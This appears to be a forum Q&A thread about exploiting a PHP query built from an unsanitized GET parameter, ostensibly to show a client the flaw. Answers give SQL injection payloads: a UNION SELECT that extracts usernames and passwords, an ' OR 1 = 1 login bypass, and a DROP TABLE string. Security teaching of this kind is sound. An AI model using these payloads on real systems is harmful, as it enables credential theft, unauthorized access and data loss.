1

This is a follow-up to this question: Is PHP's addslashes vulnerable to sql injection attack? (thanks to everyone that replied over there).

Same scenario, but I have this code (in another page):

             $ID = $_GET['id'];
             $sql = "SELECT * FROM blog WHERE id='$ID'";
             $result = mysql_query($sql);

This should be easy enough to exploit, right?

If I remember correctly I CANNOT run a second query inside mysql_query() but I should be able to do some other malicious stuff, right? Would love to be able to insert a user into the admin table or change a password or something, but I assume I wouldn't be able to do anything other than touch the blog table. Is that correct? Any suggestions on how I can play around and tweak something to prove that there are concerns?

Improve this question
5
  • Please avoid extraneous references to other questions. Commented Dec 1, 2011 at 11:58
  • @Marco - "mysql_query() sends a unique query (multiple queries are not supported)" (source: php.net/manual/en/function.mysql-query.php) Commented Dec 1, 2011 at 11:59
  • Some (93!) interesting slides on Advanced SQL Injection on Slideshare. Commented Dec 1, 2011 at 12:06
  • this question smells. we have no proof that it is actually a security audit (performed by someone who have no idea on security at all) Commented Dec 1, 2011 at 12:57
  • @col - thats the exact reason i am here asking you guys. i haven't done a security audit before, though i have done web development, and i have a client that has asked me to do update their site with best practices. their request was that i show them a vulnerability. i did a bunch of google research but was unable to come up with anything that would prove my point. you guys gave me enough to do what i needed to do though, and i appreciate that. Commented Dec 1, 2011 at 13:04

2 Answers 2

Reset to default
6

It's called UNION and allows you to pull from extra tables by using a second query.

I'm guessing something like 1' UNION ALL SELECT username title, password body FROM users WHERE '1'='1 would work. (pulls from the users table and maps the username and password values to their blog "equivalents").

Improve this answer
Sign up to request clarification or add additional context in comments.

1 Comment

UNION definitely helped. I was unsure of the construct in this scenario, but I appreciate the nudge in the right direction.
-2

I don't think anyone would think you're trying to hack someone - this is a legitimate question.

You can't run a second query here, but you could do something malicious. For example if the query were an authentication query like so:

SELECT * FROM `users` WHERE `username` = '$username' AND `password` = '$password';

You could quite easily log in with ' OR 1 = 1 and gain access to the website.

Also, if the query was a DELETE or UPDATE query you could probably manipulate it to run without a WHERE clause.

Improve this answer

4 Comments

Actually, you can run a second query.
"mysql_query() sends a unique query (multiple queries are not supported)" (source: php.net/manual/en/function.mysql-query.php). If that's wrong, forgive me for going by what the PHP manual says.
You can use UNION - it's a SQL thing that allows you to execute multiple queries.
Ah, I didn't realise you counted that as a second query. I was talking about the classic SQL injection attack which most libraries make redundant now, in which you log in to a site with '; DROP TABLE users; --

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.